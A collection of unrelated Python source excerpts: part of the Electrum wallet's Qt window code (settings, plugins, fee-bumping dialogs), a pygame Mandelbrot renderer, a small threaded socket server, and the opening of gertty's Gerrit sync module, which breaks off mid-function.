msg += '\n\n'.join(fmt_docs(*item) for item in coinchooser.COIN_CHOOSERS.items())
chooser_label = HelpLabel(_('Coin selection') + ':', msg)
chooser_combo = QComboBox()
chooser_combo.addItems(choosers)
i = choosers.index(chooser_name) if chooser_name in choosers else 0
chooser_combo.setCurrentIndex(i)
def on_chooser(x):
chooser_name = choosers[chooser_combo.currentIndex()]
self.config.set_key('coin_chooser', chooser_name)
chooser_combo.currentIndexChanged.connect(on_chooser)
tx_widgets.append((chooser_label, chooser_combo))
def on_unconf(x):
self.config.set_key('confirmed_only', bool(x))
conf_only = self.config.get('confirmed_only', False)
unconf_cb = QCheckBox(_('Spend only confirmed coins'))
unconf_cb.setToolTip(_('Spend only confirmed inputs.'))
unconf_cb.setChecked(conf_only)
unconf_cb.stateChanged.connect(on_unconf)
tx_widgets.append((unconf_cb, None))
# Fiat Currency
hist_checkbox = QCheckBox()
fiat_address_checkbox = QCheckBox()
ccy_combo = QComboBox()
ex_combo = QComboBox()
def update_currencies():
if not self.fx: return
currencies = sorted(self.fx.get_currencies(self.fx.get_history_config()))
ccy_combo.clear()
ccy_combo.addItems([_('None')] + currencies)
if self.fx.is_enabled():
ccy_combo.setCurrentIndex(ccy_combo.findText(self.fx.get_currency()))
def update_history_cb():
if not self.fx: return
hist_checkbox.setChecked(self.fx.get_history_config())
hist_checkbox.setEnabled(self.fx.is_enabled())
def update_fiat_address_cb():
if not self.fx: return
fiat_address_checkbox.setChecked(self.fx.get_fiat_address_config())
def update_exchanges():
if not self.fx: return
b = self.fx.is_enabled()
ex_combo.setEnabled(b)
if b:
h = self.fx.get_history_config()
c = self.fx.get_currency()
exchanges = self.fx.get_exchanges_by_ccy(c, h)
else:
exchanges = self.fx.get_exchanges_by_ccy('USD', False)
ex_combo.clear()
ex_combo.addItems(sorted(exchanges))
ex_combo.setCurrentIndex(ex_combo.findText(self.fx.config_exchange()))
def on_currency(hh):
if not self.fx: return
b = bool(ccy_combo.currentIndex())
ccy = str(ccy_combo.currentText()) if b else None
self.fx.set_enabled(b)
if b and ccy != self.fx.ccy:
self.fx.set_currency(ccy)
update_history_cb()
update_exchanges()
self.update_fiat()
def on_exchange(idx):
exchange = str(ex_combo.currentText())
if self.fx and self.fx.is_enabled() and exchange and exchange != self.fx.exchange.name():
self.fx.set_exchange(exchange)
def on_history(checked):
if not self.fx: return
self.fx.set_history_config(checked)
update_exchanges()
self.history_list.refresh_headers()
if self.fx.is_enabled() and checked:
# reset timeout to get historical rates
self.fx.timeout = 0
def on_fiat_address(checked):
if not self.fx: return
self.fx.set_fiat_address_config(checked)
self.address_list.refresh_headers()
self.address_list.update()
update_currencies()
update_history_cb()
update_fiat_address_cb()
update_exchanges()
ccy_combo.currentIndexChanged.connect(on_currency)
hist_checkbox.stateChanged.connect(on_history)
fiat_address_checkbox.stateChanged.connect(on_fiat_address)
ex_combo.currentIndexChanged.connect(on_exchange)
fiat_widgets = []
fiat_widgets.append((QLabel(_('Fiat currency')), ccy_combo))
fiat_widgets.append((QLabel(_('Show history rates')), hist_checkbox))
fiat_widgets.append((QLabel(_('Show Fiat balance for addresses')), fiat_address_checkbox))
fiat_widgets.append((QLabel(_('Source')), ex_combo))
tabs_info = [
(fee_widgets, _('Fees')),
(tx_widgets, _('Transactions')),
(gui_widgets, _('Appearance')),
(fiat_widgets, _('Fiat')),
(id_widgets, _('Identity')),
]
for widgets, name in tabs_info:
tab = QWidget()
grid = QGridLayout(tab)
grid.setColumnStretch(0,1)
for a,b in widgets:
i = grid.rowCount()
if b:
if a:
grid.addWidget(a, i, 0)
grid.addWidget(b, i, 1)
else:
grid.addWidget(a, i, 0, 1, 2)
tabs.addTab(tab, name)
vbox.addWidget(tabs)
vbox.addStretch(1)
vbox.addLayout(Buttons(CloseButton(d)))
d.setLayout(vbox)
# run the dialog
d.exec_()
if self.fx:
self.fx.timeout = 0
self.alias_received_signal.disconnect(set_alias_color)
run_hook('close_settings_dialog')
if self.need_restart:
self.show_warning(_('Please restart Electrum to activate the new GUI settings'), title=_('Success'))
def closeEvent(self, event):
# It seems in some rare cases this closeEvent() is called twice
if not self.cleaned_up:
self.cleaned_up = True
self.clean_up()
event.accept()
def clean_up(self):
self.wallet.thread.stop()
if self.network:
self.network.unregister_callback(self.on_network)
self.config.set_key("is_maximized", self.isMaximized())
if not self.isMaximized():
g = self.geometry()
self.wallet.storage.put("winpos-qt", [g.left(),g.top(),
g.width(),g.height()])
self.config.set_key("console-history", self.console.history[-50:],
True)
if self.qr_window:
self.qr_window.close()
self.close_wallet()
self.gui_object.close_window(self)
def plugins_dialog(self):
self.pluginsdialog = d = WindowModalDialog(self, _('Electrum Plugins'))
plugins = self.gui_object.plugins
vbox = QVBoxLayout(d)
# plugins
scroll = QScrollArea()
scroll.setEnabled(True)
scroll.setWidgetResizable(True)
scroll.setMinimumSize(400,250)
vbox.addWidget(scroll)
w = QWidget()
scroll.setWidget(w)
w.setMinimumHeight(plugins.count() * 35)
grid = QGridLayout()
grid.setColumnStretch(0,1)
w.setLayout(grid)
settings_widgets = {}
def enable_settings_widget(p, name, i):
widget = settings_widgets.get(name)
if not widget and p and p.requires_settings():
widget = settings_widgets[name] = p.settings_widget(d)
grid.addWidget(widget, i, 1)
if widget:
widget.setEnabled(bool(p and p.is_enabled()))
def do_toggle(cb, name, i):
p = plugins.toggle(name)
cb.setChecked(bool(p))
enable_settings_widget(p, name, i)
run_hook('init_qt', self.gui_object)
for i, descr in enumerate(plugins.descriptions.values()):
name = descr['__name__']
p = plugins.get(name)
if descr.get('registers_keystore'):
continue
try:
cb = QCheckBox(descr['fullname'])
plugin_is_loaded = p is not None
cb_enabled = (not plugin_is_loaded and plugins.is_available(name, self.wallet)
or plugin_is_loaded and p.can_user_disable())
cb.setEnabled(cb_enabled)
cb.setChecked(plugin_is_loaded and p.is_enabled())
grid.addWidget(cb, i, 0)
enable_settings_widget(p, name, i)
cb.clicked.connect(partial(do_toggle, cb, name, i))
msg = descr['description']
if descr.get('requires'):
msg += '\n\n' + _('Requires') + ':\n' + '\n'.join(map(lambda x: x[1], descr.get('requires')))
grid.addWidget(HelpButton(msg), i, 2)
except Exception:
self.print_msg("error: cannot display plugin", name)
traceback.print_exc(file=sys.stdout)
grid.setRowStretch(len(plugins.descriptions.values()), 1)
vbox.addLayout(Buttons(CloseButton(d)))
d.exec_()
def cpfp(self, parent_tx, new_tx):
total_size = parent_tx.estimated_size() + new_tx.estimated_size()
d = WindowModalDialog(self, _('Child Pays for Parent'))
vbox = QVBoxLayout(d)
msg = (
"A CPFP is a transaction that sends an unconfirmed output back to "
"yourself, with a high fee. The goal is to have miners confirm "
"the parent transaction in order to get the fee attached to the "
"child transaction.")
vbox.addWidget(WWLabel(_(msg)))
msg2 = ("The proposed fee is computed using your "
"fee/kB settings, applied to the total size of both child and "
"parent transactions. After you broadcast a CPFP transaction, "
"it is normal to see a new unconfirmed transaction in your history.")
vbox.addWidget(WWLabel(_(msg2)))
grid = QGridLayout()
grid.addWidget(QLabel(_('Total size') + ':'), 0, 0)
grid.addWidget(QLabel('%d bytes'% total_size), 0, 1)
max_fee = new_tx.output_value()
grid.addWidget(QLabel(_('Input amount') + ':'), 1, 0)
grid.addWidget(QLabel(self.format_amount(max_fee) + ' ' + self.base_unit()), 1, 1)
output_amount = QLabel('')
grid.addWidget(QLabel(_('Output amount') + ':'), 2, 0)
grid.addWidget(output_amount, 2, 1)
fee_e = BTCAmountEdit(self.get_decimal_point)
def f(x):
a = max_fee - fee_e.get_amount()
output_amount.setText((self.format_amount(a) + ' ' + self.base_unit()) if a else '')
fee_e.textChanged.connect(f)
fee = self.config.fee_per_kb() * total_size / 1000
fee_e.setAmount(fee)
grid.addWidget(QLabel(_('Fee' + ':')), 3, 0)
grid.addWidget(fee_e, 3, 1)
def on_rate(dyn, pos, fee_rate):
fee = fee_rate * total_size / 1000
fee = min(max_fee, fee)
fee_e.setAmount(fee)
fee_slider = FeeSlider(self, self.config, on_rate)
fee_slider.update()
grid.addWidget(fee_slider, 4, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return
fee = fee_e.get_amount()
if fee > max_fee:
self.show_error(_('Max fee exceeded'))
return
new_tx = self.wallet.cpfp(parent_tx, fee)
new_tx.set_rbf(True)
self.show_transaction(new_tx)
def bump_fee_dialog(self, tx):
is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx)
tx_label = self.wallet.get_label(tx.txid())
tx_size = tx.estimated_size()
d = WindowModalDialog(self, _('Bump Fee'))
vbox = QVBoxLayout(d)
vbox.addWidget(QLabel(_('Current fee') + ': %s'% self.format_amount(fee) + ' ' + self.base_unit()))
vbox.addWidget(QLabel(_('New fee' + ':')))
fee_e = BTCAmountEdit(self.get_decimal_point)
fee_e.setAmount(fee * 1.5)
vbox.addWidget(fee_e)
def on_rate(dyn, pos, fee_rate):
fee = fee_rate * tx_size / 1000
fee_e.setAmount(fee)
fee_slider = FeeSlider(self, self.config, on_rate)
vbox.addWidget(fee_slider)
cb = QCheckBox(_('Final'))
vbox.addWidget(cb)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return
is_final = cb.isChecked()
new_fee = fee_e.get_amount()
delta = new_fee - fee
if delta < 0:
self.show_error("fee too low")
return
try:
new_tx = self.wallet.bump_fee(tx, delta)
except BaseException as e:
self.show_error(str(e))
return
if is_final:
new_tx.set_rbf(False)
self.show_transaction(new_tx, tx_label)
|
__main__.py
|
from multiprocessing import Process
from numba import jit
import os, sys
import math
import time
# Initialises Pygame graphics library and hides debugging output
os.environ['PYGAME_HIDE_SUPPORT_PROMPT'] = "hide"
import pygame
os.environ['SDL_VIDEO_CENTERED'] = '0'
pygame.display.init()
pygame.font.init()
refresh_Rate = pygame.time.Clock()
@jit
def calcMandelbrotPoint(x,y):
z = 0 + 0*1j
c = x + y*1j
if (show_Axis == True):
# draws a white line for each of the axis if configured
if x == (0 + x_Offset) or y == (0 - y_Offset):
return (255,255,255)
times_Looped = 0;
for i in range(precision):
if (z.real ** 2) + (z.imag ** 2) > 4:
break
z = (z**2) + c;
times_Looped += 1
# Return the color of the point
if times_Looped != precision:
return (255 * ((1 - math.cos( 0.5 * times_Looped))/2) ,255 * ((1 - math.cos(0.25 * times_Looped)) / 2),255 * (1 - math.sin( 0 * times_Looped)) /2)
else:
return (0,0,0)
def calculateSector(pixel_Array,sectorMap,sector_X,sector_Y):
# Loops through the given points appending the result of the point to the pixel array
for y in range(sectorMap[1][sector_Y][0],sectorMap[1][sector_Y][1]):
if (sector_X == 1 and sector_Y == 2 and y % 2 == 0):
pygame.display.update()
for x in range(sectorMap[0][sector_X][0],sectorMap[0][sector_X][1]):
pixel_Array[x][y] = calcMandelbrotPoint((((x - (window_Width/2))/window_Width) * 3 / zoom) + x_Offset,(((y - (window_Height/2))/window_Height) * 3 / zoom) - y_Offset)
def render_MandelbrotSet():
# create a 2D array each representing a single pixel on the screen
pixel_Array = pygame.PixelArray(screen)
# gets the current time to be used for the calculation of the time to compute the Mandelbrot set
time_Start = time.perf_counter()
# Defines the sections of the graph for each computer core to render
# This allow for simultaneous multiprocessing of the data (can reduce the time to update by 60% or more)
sectorMap = [
[[0,int(window_Width/4)],[int(window_Width/4),int(window_Width/2)],[int(window_Width/2),int((window_Width/4)*3)],[int((window_Width/4)*3),window_Width]],
[[0,int(window_Height/4)],[int(window_Height/4),int(window_Height/2)],[int(window_Height/2),int((window_Height/4)*3)],[int((window_Height/4)*3),window_Height]]
];
core_Processes = []
# appends each process to the array to allow for dynamic assignment and operations
for y in range(4):
for x in range(4):
core_Processes.append(Process(target=calculateSector, args=(pixel_Array,sectorMap,x,y,)))
# Starts each of the processes
for process in core_Processes:
process.start()
# Closes each of the process once completed
for process in core_Processes:
process.join()
# renders the final array to the screen surface
pixel_Array.make_surface()
# Shows Axis and labels if configured
if (show_Axis == True):
del pixel_Array
font = pygame.font.SysFont('./FiraSans-Regular.ttf', 30)
# adds the axis labels
imag_Label = font.render('Imag', True, (255, 255, 255))
real_Label = font.render('Real', True, (255, 255, 255))
# Adds point labels to the axis
center_Label = font.render('('+str(0+x_Offset)+','+str(0+y_Offset)+')', True, (255, 255, 255))
yPos_Label = font.render('('+str(0+x_Offset)+','+str(-(((0 - (window_Height/2))/window_Height) * 3 / zoom + y_Offset))+')', True, (255, 255, 255))
xNeg_Label = font.render('('+str((((0 - (window_Width/2))/window_Width) * 3 / zoom + x_Offset))+','+str(0+y_Offset)+')', True, (255, 255, 255))
zoom_Label = font.render('Zoom '+str(zoom)+'x', True, (255, 255, 255))
# Renders the text onto the screen
screen.blit(imag_Label,(int(window_Width/2) + 5,5))
screen.blit(real_Label,(window_Width - 50,int(window_Width/2) - 25))
screen.blit(zoom_Label,(5,5))
screen.blit(center_Label,(int(window_Width/2) + 5,int(window_Width/2) + 5))
screen.blit(yPos_Label,(int(window_Width/2) - 90,5))
screen.blit(xNeg_Label,(0,int(window_Width/2) + 5))
#prints to the console the time taken to compute
print("Computational Time: %5.1f secs" % (time.perf_counter() - time_Start))
def __init__():
global window_Width, window_Height, precision, zoom, x_Offset, y_Offset, show_Axis
window_Width = 1000
window_Height = 1000
precision = 10000
zoom = 10
x_Offset = -0.5
y_Offset = 0
show_Axis = True
completed_Config = False
# asks the user if they want to use a custom configuration for the render
while completed_Config == False:
default_Mode = input("Use default config options (y/n): ")
if (default_Mode.lower() == "y" or default_Mode.lower() == "yes"):
completed_Config = True
elif (default_Mode.lower() == "n" or default_Mode.lower() == "no"):
completed_Config = True
else:
print("Value was invalid please try again")
# Manual Configuration Options
if (default_Mode.lower() == "n" or default_Mode.lower() == "no"):
completed_Config = False
while completed_Config == False:
try:
precision = int(input("Enter Precision: "))
completed_Config = True
except:
print("Value was invalid please try again")
completed_Config = False
while completed_Config == False:
try:
zoom = float(input("Enter Zoom level (Must be > 0): "))
completed_Config = True
except:
print("Value was invalid please try again")
completed_Config = False
while completed_Config == False:
try:
x_Offset = float(input("Enter x_Offset: "))
completed_Config = True
except:
print("Value was invalid please try again")
completed_Config = False
while completed_Config == False:
try:
y_Offset = float(input("Enter y_Offset: "))
completed_Config = True
except:
print("Value was invalid please try again")
completed_Config = False
while completed_Config == False:
input_Value = input("Show Axis? (true,false): ")
if (input_Value.lower() == "t" or input_Value.lower() == "true"):
show_Axis = True
completed_Config = True
elif (input_Value.lower() == "f" or input_Value.lower() == "false"):
show_Axis = False
completed_Config = True
else:
print("Value was invalid please try again")
def __main__():
global screen
screen = pygame.display.set_mode((window_Width,window_Height))
screen.fill((46, 48, 58))
# Sets the application window title
pygame.display.set_caption("Mitchell Wills 2020 | Mandelbrot Set")
render_MandelbrotSet()
while True:
# Keeps application running until the user closes it
events = pygame.event.get()
refresh_Rate.tick(24)
for event in events:
if event.type == pygame.QUIT:
pygame.quit()
__init__()
__main__()
|
server.py
|
import socket
import threading
HEADER = 64
PORT = 5050
SERVER = socket.gethostbyname(socket.gethostname())
ADDR = (SERVER, PORT)
FORMAT = 'utf-8'
DISCONNECT_MESSAGE = "!DISCONNECT"
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.bind(ADDR)
def handle_client(conn, addr):
print(f"[NEW CONNECTION] {addr} connected.")
connected = True
while connected:
msg_length = conn.recv(HEADER).decode(FORMAT)
if msg_length:
msg_length = int(msg_length)
msg = conn.recv(msg_length).decode(FORMAT)
if msg == DISCONNECT_MESSAGE:
connected = False
print(f"[{addr}] {msg}")
conn.send("Msg received".encode(FORMAT))
conn.close()
def start():
server.listen()
print(f"[LISTENING] Server is listening on {SERVER}")
while True:
conn, addr = server.accept()
thread = threading.Thread(target=handle_client, args=(conn, addr))
thread.start()
print(f"[ACTIVE CONNECTIONS] {threading.activeCount() - 1}")
print("[STARTING] server is starting...")
start()
|
sync.py
|
# Copyright 2014 OpenStack Foundation
# Copyright 2014 Hewlett-Packard Development Company, L.P.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import collections
import errno
import logging
import math
import os
import re
import threading
import json
import time
import datetime
import warnings
import dateutil.parser
try:
import ordereddict
except:
pass
import requests
import requests.utils
import six
from six.moves import queue
from six.moves.urllib import parse as urlparse
import gertty.version
from gertty import gitrepo
from gertty.auth import FormAuth
HIGH_PRIORITY=0
NORMAL_PRIORITY=1
LOW_PRIORITY=2
TIMEOUT=30
CLOSED_STATUSES = ['MERGED', 'ABANDONED']
class OfflineError(Exception):
pass
class MultiQueue(object):
def __init__(self, priorities):
try:
self.queues = collections.OrderedDict()
except AttributeError:
self.queues = ordereddict.OrderedDict()
for key in priorities:
self.queues[key] = collections.deque()
self.condition = threading.Condition()
self.incomplete = []
def qsize(self):
count = 0
self.condition.acquire()
try:
for queue in self.queues.values():
count += len(queue)
return count + len(self.incomplete)
finally:
self.condition.release()
def put(self, item, priority):
added = False
self.condition.acquire()
try:
if item not in self.queues[priority]:
self.queues[priority].append(item)
added = True
self.condition.notify()
finally:
self.condition.release()
return added
def get(self):
self.condition.acquire()
try:
while True:
for queue in self.queues.values():
try:
ret = queue.popleft()
self.incomplete.append(ret)
return ret
except IndexError:
pass
self.condition.wait()
finally:
self.condition.release()
def find(self, klass, priority):
results = []
self.condition.acquire()
try:
for item in self.queues[priority]:
if isinstance(item, klass):
results.append(item)
finally:
self.condition.release()
return results
def complete(self, item):
self.condition.acquire()
try:
if item in self.incomplete:
self.incomplete.remove(item)
finally:
self.condition.release()
class UpdateEvent(object):
def updateRelatedChanges(self, session, change):
related_change_keys = set()
related_change_keys.add(change.key)
for revision in change.revisions:
parent = session.getRevisionByCommit(revision.parent)
if parent:
related_change_keys.add(parent.change.key)
for child in session.getRevisionsByParent(revision.commit):
related_change_keys.add(child.change.key)
self.related_change_keys = related_change_keys
class ProjectAddedEvent(UpdateEvent):
def __repr__(self):
return '<ProjectAddedEvent project_key:%s>' % (
self.project_key,)
def __init__(self, project):
self.project_key = project.key
class ChangeAddedEvent(UpdateEvent):
def __repr__(self):
return '<ChangeAddedEvent project_key:%s change_key:%s>' % (
self.project_key, self.change_key)
def __init__(self, change):
self.project_key = change.project.key
self.change_key = change.key
self.related_change_keys = set()
self.review_flag_changed = True
self.status_changed = True
self.held_changed = False
class ChangeUpdatedEvent(UpdateEvent):
def __repr__(self):
return '<ChangeUpdatedEvent project_key:%s change_key:%s review_flag_changed:%s status_changed:%s>' % (
self.project_key, self.change_key, self.review_flag_changed, self.status_changed)
def __init__(self, change):
self.project_key = change.project.key
self.change_key = change.key
self.related_change_keys = set()
self.review_flag_changed = False
self.status_changed = False
self.held_changed = False
class Task(object):
def __init__(self, priority=NORMAL_PRIORITY):
self.log = logging.getLogger('gertty.sync')
self.priority = priority
self.succeeded = None
self.event = threading.Event()
self.tasks = []
self.results = []
def complete(self, success):
self.succeeded = success
self.event.set()
def wait(self, timeout=None):
self.event.wait(timeout)
return self.succeeded
def __eq__(self, other):
raise NotImplementedError()
class SyncOwnAccountTask(Task):
def __repr__(self):
return '<SyncOwnAccountTask>'
def __eq__(self, other):
if other.__class__ == self.__class__:
return True
return False
def run(self, sync):
app = sync.app
remote = sync.get('accounts/self')
sync.account_id = remote['_account_id']
with app.db.getSession() as session:
session.getAccountByID(remote['_account_id'],
remote.get('name'),
remote.get('username'),
remote.get('email'))
class GetVersionTask(Task):
def __repr__(self):
return '<GetVersionTask>'
def __eq__(self, other):
if other.__class__ == self.__class__:
return True
return False
def run(self, sync):
version = sync.get('config/server/version')
sync.setRemoteVersion(version)
class SyncProjectListTask(Task):
def __repr__(self):
return '<SyncProjectListTask>'
def __eq__(self, other):
if other.__class__ == self.__class__:
return True
return False
def run(self, sync):
app = sync.app
remote = sync.get('projects/?d')
remote_keys = set(remote.keys())
with app.db.getSession() as session:
local = {}
for p in session.getProjects():
local[p.name] = p
local_keys = set(local.keys())
for name in local_keys-remote_keys:
self.log.info("Deleted project %s", name)
local[name].delete()
for name in remote_keys-local_keys:
p = remote[name]
project = session.createProject(name,
description=p.get('description', ''))
self.log.info("Created project %s", project.name)
self.results.append(ProjectAddedEvent(project))
class SyncSubscribedProjectBranchesTask(Task):
def __repr__(self):
return '<SyncSubscribedProjectBranchesTask>'
def __eq__(self, other):
if other.__class__ == self.__class__:
return True
return False
def run(self, sync):
app = sync.app
with app.db.getSession() as session:
projects = session.getProjects(subscribed=True)
for p in projects:
sync.submitTask(SyncProjectBranchesTask(p.name, self.priority))
class SyncProjectBranchesTask(Task):
branch_re = re.compile(r'refs/heads/(.*)')
def __init__(self, project_name, priority=NORMAL_PRIORITY):
super(SyncProjectBranchesTask, self).__init__(priority)
self.project_name = project_name
def __repr__(self):
return '<SyncProjectBranchesTask %s>' % (self.project_name,)
def __eq__(self, other):
if (other.__class__ == self.__class__ and
other.project_name == self.project_name):
return True
return False
def run(self, sync):
app = sync.app
remote = sync.get('projects/%s/branches/' % urlparse.quote_plus(self.project_name))
remote_branches = set()
for x in remote:
m = self.branch_re.match(x['ref'])
if m:
remote_branches.add(m.group(1))
with app.db.getSession() as session:
local = {}
project = session.getProjectByName(self.project_name)
for branch in project.branches:
local[branch.name] = branch
local_branches = set(local.keys())
for name in local_branches-remote_branches:
session.delete(local[name])
self.log.info("Deleted branch %s from project %s in local DB.", name, project.name)
for name in remote_branches-local_branches:
project.createBranch(name)
self.log.info("Added branch %s to project %s in local DB.", name, project.name)
class SyncSubscribedProjectsTask(Task):
def __repr__(self):
return '<SyncSubscribedProjectsTask>'
def __eq__(self, other):
if (other.__class__ == self.__class__):
return True
return False
def run(self, sync):
app = sync.app
with app.db.getSession() as session:
keys = [p.key for p in session.getProjects(subscribed=True)]
for i in range(0, len(keys), 10):
t = SyncProjectTask(keys[i:i+10], self.priority)
self.tasks.append(t)
sync.submitTask(t)
t = SyncQueriedChangesTask('owner', 'is:owner', self.priority)
self.tasks.append(t)
sync.submitTask(t)
t = SyncQueriedChangesTask('starred', 'is:starred', self.priority)
self.tasks.append(t)
sync.submitTask(t)
class SyncProjectTask(Task):
def __init__(self, project_keys, priority=NORMAL_PRIORITY):
super(SyncProjectTask, self).__init__(priority)
if type(project_keys) == int:
project_keys = [project_keys]
self.project_keys = project_keys
def __repr__(self):
return '<SyncProjectTask %s>' % (self.project_keys,)
def __eq__(self, other):
if (other.__class__ == self.__class__ and
other.project_keys == self.project_keys):
return True
return False
def run(self, sync):
app = sync.app
now = datetime.datetime.utcnow()
queries = []
with app.db.getSession() as session:
for project_key in self.project_keys:
project = session.getProject(project_key)
query = 'q=project:%s' % project.name
if project.updated:
# Allow 4 seconds for request time, etc.
query += ' -age:%ss' % (int(math.ceil((now-project.updated).total_seconds())) + 4,)
else:
query += ' status:open'
queries.append(query)
changes = sync.query(queries)
change_ids = [c['id'] for c in changes]
with app.db.getSession() as session:
# Winnow the list of IDs to only the ones in the local DB.
change_ids = session.getChangeIDs(change_ids)
for c in changes:
# For now, just sync open changes or changes already
# in the db optionally we could sync all changes ever
if c['id'] in change_ids or (c['status'] not in CLOSED_STATUSES):
sync.submitTask(SyncChangeTask(c['id'], priority=self.priority))
for key in self.project_keys:
sync.submitTask(SetProjectUpdatedTask(key, now, priority=self.priority))
class SetProjectUpdatedTask(Task):
def __init__(self, project_key, updated, priority=NORMAL_PRIORITY):
super(SetProjectUpdatedTask, self).__init__(priority)
self.project_key = project_key
self.updated = updated
def __repr__(self):
return '<SetProjectUpdatedTask %s %s>' % (self.project_key, self.updated)
def __eq__(self, other):
if (other.__class__ == self.__class__ and
other.project_key == self.project_key and
other.updated == self.updated):
return True
return False
def run(self, sync):
app = sync.app
with app.db.getSession() as session:
project = session.getProject(self.project_key)
project.updated = self.updated
class SyncQueriedChangesTask(Task):
def __init__(self, query_name, query, priority=NORMAL_PRIORITY):
super(SyncQueriedChangesTask, self).__init__(priority)
self.query_name = query_name
self.query = query
def __repr__(self):
return '<SyncQueriedChangesTask %s>' % self.query_name
def __eq__(self, other):
if (other.__class__ == self.__class__ and
other.query_name == self.query_name and
other.query == self.query):
return True
return False
def run(self, sync):
app = sync.app
now = datetime.datetime.utcnow()
with app.db.getSession() as session:
sync_query = session.getSyncQueryByName(self.query_name)
query = 'q=%s' % self.query
if sync_query.updated:
# Allow 4 seconds for request time, etc.
query += ' -age:%ss' % (int(math.ceil((now-sync_query.updated).total_seconds())) + 4,)
else:
query += ' status:open'
for project in session.getProjects(subscribed=True):
query += ' -project:%s' % project.name
changes = []
sortkey = ''
done = False
offset = 0
while not done:
# We don't actually want to limit to 500, but that's the server-side default, and
# if we don't specify this, we won't get a _more_changes flag.
q = 'changes/?n=500%s&%s' % (sortkey, query)
self.log.debug('Query: %s ' % (q,))
batch = sync.get(q)
done = True
if batch:
changes += batch
if '_more_changes' in batch[-1]:
done = False
if '_sortkey' in batch[-1]:
sortkey = '&N=%s' % (batch[-1]['_sortkey'],)
else:
offset += len(batch)
sortkey = '&start=%s' % (offset,)
change_ids = [c['id'] for c in changes]
with app.db.getSession() as session:
# Winnow the list of IDs to only the ones in the local DB.
change_ids = session.getChangeIDs(change_ids)
for c in changes:
# For now, just sync open changes or changes already
# in the db optionally we could sync all changes ever
if c['id'] in change_ids or (c['status'] not in CLOSED_STATUSES):
sync.submitTask(SyncChangeTask(c['id'], priority=self.priority))
sync.submitTask(SetSyncQueryUpdatedTask(self.query_name, now, priority=self.priority))
class SetSyncQueryUpdatedTask(Task):
def __init__(self, query_name, updated, priority=NORMAL_PRIORITY):
super(SetSyncQueryUpdatedTask, self).__init__(priority)
self.query_name = query_name
self.updated = updated
def __repr__(self):
return '<SetSyncQueryUpdatedTask %s %s>' % (self.query_name, self.updated)
def __eq__(self, other):
if (other.__class__ == self.__class__ and
other.query_name == self.query_name and
other.updated == self.updated):
return True
return False
def run(self, sync):
app = sync.app
with app.db.getSession() as session:
sync_query = session.getSyncQueryByName(self.query_name)
sync_query.updated = self.updated
class SyncChangesByCommitsTask(Task):
def __init__(self, commits, priority=NORMAL_PRIORITY):
super(SyncChangesByCommitsTask, self).__init__(priority)
self.commits = commits
def __repr__(self):
return '<SyncChangesByCommitsTask %s>' % (self.commits,)
def __eq__(self, other):
if (other.__class__ == self.__class__ and
other.commits == self.commits):
return True
return False
def run(self, sync):
query = ' OR '.join(['commit:%s' % x for x in self.commits])
changes = sync.get('changes/?q=%s' % query)
self.log.debug('Query: %s ' % (query,))
for c in changes:
sync.submitTask(SyncChangeTask(c['id'], priority=self.priority))
self.log.debug("Sync change %s for its commit" % (c['id'],))
def addCommit(self, commit):
if commit in self.commits:
return True
# 100 should be under the URL length limit
if len(self.commits) >= 100:
return False
self.commits.append(commit)
return True
class SyncChangeByNumberTask(Task):
def __init__(self, number, priority=NORMAL_PRIORITY):
super(SyncChangeByNumberTask, self).__init__(priority)
self.number = number
def __repr__(self):
return '<SyncChangeByNumberTask %s>' % (self.number,)
def __eq__(self, other):
if (other.__class__ == self.__class__ and
other.number == self.number):
return True
return False
def run(self, sync):
query = '%s' % self.number
changes = sync.get('changes/?q=%s' % query)
self.log.debug('Query: %s ' % (query,))
for c in changes:
task = SyncChangeTask(c['id'], priority=self.priority)
self.tasks.append(task)
sync.submitTask(task)
self.log.debug("Sync change %s because it is number %s" % (c['id'], self.number))
class SyncOutdatedChangesTask(Task):
def __init__(self, priority=NORMAL_PRIORITY):
super(SyncOutdatedChangesTask, self).__init__(priority)
def __eq__(self, other):
if other.__class__ == self.__class__:
return True
return False
def __repr__(self):
return '<SyncOutdatedChangesTask>'
def run(self, sync):
with sync.app.db.getSession() as session:
for change in session.getOutdated():
self.log.debug("Sync outdated change %s" % (change.id,))
sync.submitTask(SyncChangeTask(change.id, priority=self.priority))
class SyncChangeTask(Task):
def __init__(self, change_id, force_fetch=False, priority=NORMAL_PRIORITY):
super(SyncChangeTask, self).__init__(priority)
self.change_id = change_id
self.force_fetch = force_fetch
def __repr__(self):
return '<SyncChangeTask %s>' % (self.change_id,)
def __eq__(self, other):
if (other.__class__ == self.__class__ and
other.change_id == self.change_id and
other.force_fetch == self.force_fetch):
return True
return False
def run(self, sync):
start_time = time.time()
try:
self._syncChange(sync)
end_time = time.time()
total_time = end_time - start_time
self.log.info("Synced change %s in %0.5f seconds.", self.change_id, total_time)
except Exception:
try:
self.log.error("Marking change %s outdated" % (self.change_id,))
with sync.app.db.getSession() as session:
change = session.getChangeByID(self.change_id)
if change:
change.outdated = True
except Exception:
self.log.exception("Error while marking change %s as outdated" % (self.change_id,))
raise
def _syncChange(self, sync):
app = sync.app
remote_change = sync.get('changes/%s?o=DETAILED_LABELS&o=ALL_REVISIONS&o=ALL_COMMITS&o=MESSAGES&o=DETAILED_ACCOUNTS&o=CURRENT_ACTIONS&o=ALL_FILES' % self.change_id)
# Perform subqueries this task will need outside of the db session
for remote_commit, remote_revision in remote_change.get('revisions', {}).items():
remote_comments_data = sync.get('changes/%s/revisions/%s/comments' % (self.change_id, remote_commit))
remote_revision['_gertty_remote_comments_data'] = remote_comments_data
try:
remote_conflicts = sync.query(['q=status:open+is:mergeable+conflicts:%s' %
remote_change['_number']])
except Exception:
self.log.exception("Unable to sync conflicts for change %s" % self.change_id)
warnings.warn("Unable to sync conflicts for change %s" % self.change_id)
remote_conflicts = []
fetches = collections.defaultdict(list)
parent_commits = set()
with app.db.getSession() as session:
change = session.getChangeByID(self.change_id)
account = session.getAccountByID(remote_change['owner']['_account_id'],
